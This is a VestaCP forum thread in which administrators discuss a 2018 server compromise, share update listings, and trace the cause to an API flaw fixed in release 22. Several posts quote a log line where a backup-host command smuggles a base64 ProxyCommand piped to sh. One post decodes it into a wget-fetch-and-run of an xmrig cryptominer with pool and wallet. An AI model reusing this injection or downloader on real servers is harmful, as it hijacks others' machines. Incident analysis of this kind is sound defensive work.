We are happy to announce that Vesta is back under active development as of 25 February 2024. We are working on v1 candidate and expect to engage more with the community over the coming months. We are committed to open source, and we encourage contributors to help us build the future of Vesta.
have been HACKED ! by xaxaxa.eu
-
- Posts: 25
- Joined: Mon Nov 24, 2014 11:48 pm
Re: have been HACKED ! by xaxaxa.eu
to answer your question, I was indeed on 20 version.
Code: Select all
[xxx@two /]# cd /usr/local/vesta/bin
[xxx@two bin]# ./v-list-sys-vesta-updates
PKG VER REL ARCH UPDT DATE
--- --- --- ---- ---- ----
vesta 0.9.8 20 x86_64 yes 2018-04-09
vesta-php 0.9.8 17 x86_64 yes 2016-11-26
vesta-nginx 0.9.8 17 x86_64 yes 2016-11-26
-
- Posts: 25
- Joined: Mon Nov 24, 2014 11:48 pm
Re: have been HACKED ! by xaxaxa.eu
as you said, I've shutdown the hacked server and move manually all users to another one.you're up to date, good so far. now you need to clean your server - my point of view: Do not trust a infected server anymore. Better install a new one and migrate the users there.
no chance to take.
thank you for all your great advices.
Re: have been HACKED ! by xaxaxa.eu
I'm going to wait until the outcome of your research and am looking forward to the results before I do anything. My panel is on automatic upgrades - I'm sure most of the user panels are that way.
Only thing that worried me tonight was the dead.file in my file directory and there was an IP from Korea trying to log in with SSH - I've since banned his IP with my Fail2Ban - hopefully there won't be more to follow.
Once I restarted VestaCP tonight everything was fine and when I did research at UNIX about the dead.file it didn't look as though the issue belonged to VestaCP. I'm not sure about that though.
Only bad part was when I mentioned this to my VPS Host they were worried and thought immediately I was hacked because of this thread at VestaCP. I wasn't hacked.
We'll be grateful if you could respond positively from the Admin of VestaCP so our VPS Hosts can have peace of mind about our VestaCP installations. Thanks.
Re: have been HACKED ! by xaxaxa.eu
sessionclean is a part of php package and should not be removed.
Re: have been HACKED ! by xaxaxa.eu
you are are right ! I will edit my post. thanks !
-
- Posts: 1
- Joined: Sat Jun 30, 2018 11:40 am
- Os: CentOS 6x
- Web: apache + nginx
Re: have been HACKED ! by xaxaxa.eu
I got hacked as well. 3 vesta server, only 2 of them got hacked.
initially, I didn't know whats going on, so I removed execution permission from /tmp, and partially stopped it.
later found his forum and applied the updates.
Thanks Vesta team for your help and quick release of patch.
initially, I didn't know whats going on, so I removed execution permission from /tmp, and partially stopped it.
later found his forum and applied the updates.
Thanks Vesta team for your help and quick release of patch.
Re: have been HACKED ! by xaxaxa.eu
My Website was Hacked on Jun 22 around 11:10 PM UTC. My Server get upgraded to latest version automatically.But i think server was infected before that.
I have removed the miner file under /tmp/xmrig. Then i have analyzed the log of server to find the root cause and found following things:
1. No new user(sysroot) has been created as mentioned in the first post's script.
2. No New Cron Jobs has been added.
3. xmrig was ran with this cmd:
4. Found this log in /var/log/vesta/error.log
Decode Version:
My OS: Ubuntu 16
FYI
@ScIT
I have removed the miner file under /tmp/xmrig. Then i have analyzed the log of server to find the root cause and found following things:
1. No new user(sysroot) has been created as mentioned in the first post's script.
2. No New Cron Jobs has been added.
3. xmrig was ran with this cmd:
Code: Select all
./xmrig --algo=cryptonight --url=pool.minexmr.com:80 --user=42y1QFBDSVmXZbvZZ95CNpPoMddLS4dRPdmh9WgCR3vE5D1b2XqGSV5KoBHuPFSuAjS7Yr7tp48f9AMVLXugDuUMFmp6ugd --thread=1 --donate-level=1 --background
Code: Select all
2018-06-22 23:13:28 v-add-backup-host 'sftp' 'xx' '"-oProxyCommand=echo Y2QgL3RtcDtwa2lsbCB4bXItc3Rhaztwa2lsbCB4bXJpZztybSAtZiB4bXJpZyB4bXItc3RhayBjcHUudHh0IHBvb2xzLnR4dCBjb25maWcudHh0O3dnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8geG1yaWcgaHR0cHM6Ly90cmFuc2Zlci5zaC9leXo0ei94bXJpZyYmY2htb2QgK3ggeG1yaWcmJi4veG1yaWcgLS1hbGdvPWNyeXB0b25pZ2h0IC0tdXJsPXBvb2wubWluZXhtci5jb206ODAgLS11c2VyPTQyeTFRRkJEU1ZtWFpidlpaOTVDTnBQb01kZExTNGRSUGRtaDlXZ0NSM3ZFNUQxYjJYcUdTVjVLb0JIdVBGU3VBalM3WXI3dHA0OGY5QU1WTFh1Z0R1VU1GbXA2dWdkIC0tdGhyZWFkPSQoZ3JlcCBwcm9jZXNzb3IgL3Byb2MvY3B1aW5mb3x3YyAtbCkgLS1kb25hdGUtbGV2ZWw9MSAtLWJhY2tncm91bmQgPC9kZXYvbnVsbCAyPiYxID4vZGV2L251bGwK|base64 -d|sh" x' '******' [Error 15]
Code: Select all
cd /tmp;pkill xmr-stak;pkill xmrig;rm -f xmrig xmr-stak cpu.txt pools.txt config.txt;wget --no-check-certificate -qO xmrig https://transfer.sh/eyz4z/xmrig&&chmod +x xmrig&&./xmrig --algo=cryptonight --url=pool.minexmr.com:80 --user=42y1QFBDSVmXZbvZZ95CNpPoMddLS4dRPdmh9WgCR3vE5D1b2XqGSV5KoBHuPFSuAjS7Yr7tp48f9AMVLXugDuUMFmp6ugd --thread=$(grep processor /proc/cpuinfo|wc -l) --donate-level=1 --background </dev/null 2>&1 >/dev/null
FYI
@ScIT
Re: have been HACKED ! by xaxaxa.eu
+1 for the last post.
I have the same code in /var/log/vesta/error.log
I have the same code in /var/log/vesta/error.log
Code: Select all
2018-06-23 04:01:01 v-add-backup-host 'sftp' 'xx' '"-oProxyCommand=echo Y2QgL3RtcDtwa2lsbCB4bXItc3Rhaztwa2lsbCB4bXJpZztybSAtZiB4bXJpZyB4bXItc3RhayBjcHUudHh0IHBvb2xzLnR4dCBjb25maWcudHh0O3dnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8geG1yaWcgaHR0cHM6Ly90cmFuc2Zlci5zaC9leXo0ei94bXJpZyYmY2htb2QgK3ggeG1yaWcmJi4veG1yaWcgLS1hbGdvPWNyeXB0b25pZ2h0IC0tdXJsPXBvb2wubWluZXhtci5jb206ODAgLS11c2VyPTQyeTFRRkJEU1ZtWFpidlpaOTVDTnBQb01kZExTNGRSUGRtaDlXZ0NSM3ZFNUQxYjJYcUdTVjVLb0JIdVBGU3VBalM3WXI3dHA0OGY5QU1WTFh1Z0R1VU1GbXA2dWdkIC0tdGhyZWFkPSQoZ3JlcCBwcm9jZXNzb3IgL3Byb2MvY3B1aW5mb3x3YyAtbCkgLS1kb25hdGUtbGV2ZWw9MSAtLWJhY2tncm91bmQgPC9kZXYvbnVsbCAyPiYxID4vZGV2L251bGwK|base64 -d|sh" x' '******' [Error 15]
Code: Select all
./v-list-sys-vesta-updates
PKG VER REL ARCH UPDT DATE
--- --- --- ---- ---- ----
vesta 0.9.8 22 amd64 yes 2018-06-25
vesta-php 0.9.8 22 amd64 yes 2018-06-29
vesta-nginx 0.9.8 22 amd64 yes 2018-06-29
vesta-ioncube 0.9.8 21 amd64 yes 2018-06-29
vesta-softaculous 0.9.8 21 amd64 yes 2018-06-29
Re: have been HACKED ! by xaxaxa.eu
Still the same question: Was the infection before or after the update to release 22?semasping wrote: ↑Wed Jul 18, 2018 8:29 pm+1 for the last post.
I have the same code in /var/log/vesta/error.log
Code: Select all
2018-06-23 04:01:01 v-add-backup-host 'sftp' 'xx' '"-oProxyCommand=echo Y2QgL3RtcDtwa2lsbCB4bXItc3Rhaztwa2lsbCB4bXJpZztybSAtZiB4bXJpZyB4bXItc3RhayBjcHUudHh0IHBvb2xzLnR4dCBjb25maWcudHh0O3dnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8geG1yaWcgaHR0cHM6Ly90cmFuc2Zlci5zaC9leXo0ei94bXJpZyYmY2htb2QgK3ggeG1yaWcmJi4veG1yaWcgLS1hbGdvPWNyeXB0b25pZ2h0IC0tdXJsPXBvb2wubWluZXhtci5jb206ODAgLS11c2VyPTQyeTFRRkJEU1ZtWFpidlpaOTVDTnBQb01kZExTNGRSUGRtaDlXZ0NSM3ZFNUQxYjJYcUdTVjVLb0JIdVBGU3VBalM3WXI3dHA0OGY5QU1WTFh1Z0R1VU1GbXA2dWdkIC0tdGhyZWFkPSQoZ3JlcCBwcm9jZXNzb3IgL3Byb2MvY3B1aW5mb3x3YyAtbCkgLS1kb25hdGUtbGV2ZWw9MSAtLWJhY2tncm91bmQgPC9kZXYvbnVsbCAyPiYxID4vZGV2L251bGwK|base64 -d|sh" x' '******' [Error 15]
Code: Select all
./v-list-sys-vesta-updates PKG VER REL ARCH UPDT DATE --- --- --- ---- ---- ---- vesta 0.9.8 22 amd64 yes 2018-06-25 vesta-php 0.9.8 22 amd64 yes 2018-06-29 vesta-nginx 0.9.8 22 amd64 yes 2018-06-29 vesta-ioncube 0.9.8 21 amd64 yes 2018-06-29 vesta-softaculous 0.9.8 21 amd64 yes 2018-06-29
There was a security issue in the api, so it was possible to run api commands like v-add-backup-host. The issue is resolved with R22. If your system is infected, the savest way is to reinstall the server and migrate user data.
Re: have been HACKED ! by xaxaxa.eu
The system was infected before the update.ScIT wrote: ↑Thu Jul 19, 2018 6:52 amStill the same question: Was the infection before or after the update to release 22?semasping wrote: ↑Wed Jul 18, 2018 8:29 pm+1 for the last post.
I have the same code in /var/log/vesta/error.log
Code: Select all
2018-06-23 04:01:01 v-add-backup-host 'sftp' 'xx' '"-oProxyCommand=echo Y2QgL3RtcDtwa2lsbCB4bXItc3Rhaztwa2lsbCB4bXJpZztybSAtZiB4bXJpZyB4bXItc3RhayBjcHUudHh0IHBvb2xzLnR4dCBjb25maWcudHh0O3dnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8geG1yaWcgaHR0cHM6Ly90cmFuc2Zlci5zaC9leXo0ei94bXJpZyYmY2htb2QgK3ggeG1yaWcmJi4veG1yaWcgLS1hbGdvPWNyeXB0b25pZ2h0IC0tdXJsPXBvb2wubWluZXhtci5jb206ODAgLS11c2VyPTQyeTFRRkJEU1ZtWFpidlpaOTVDTnBQb01kZExTNGRSUGRtaDlXZ0NSM3ZFNUQxYjJYcUdTVjVLb0JIdVBGU3VBalM3WXI3dHA0OGY5QU1WTFh1Z0R1VU1GbXA2dWdkIC0tdGhyZWFkPSQoZ3JlcCBwcm9jZXNzb3IgL3Byb2MvY3B1aW5mb3x3YyAtbCkgLS1kb25hdGUtbGV2ZWw9MSAtLWJhY2tncm91bmQgPC9kZXYvbnVsbCAyPiYxID4vZGV2L251bGwK|base64 -d|sh" x' '******' [Error 15]
Code: Select all
./v-list-sys-vesta-updates PKG VER REL ARCH UPDT DATE --- --- --- ---- ---- ---- vesta 0.9.8 22 amd64 yes 2018-06-25 vesta-php 0.9.8 22 amd64 yes 2018-06-29 vesta-nginx 0.9.8 22 amd64 yes 2018-06-29 vesta-ioncube 0.9.8 21 amd64 yes 2018-06-29 vesta-softaculous 0.9.8 21 amd64 yes 2018-06-29
There was a security issue in the api, so it was possible to run api commands like v-add-backup-host. The issue is resolved with R22. If your system is infected, the savest way is to reinstall the server and migrate user data.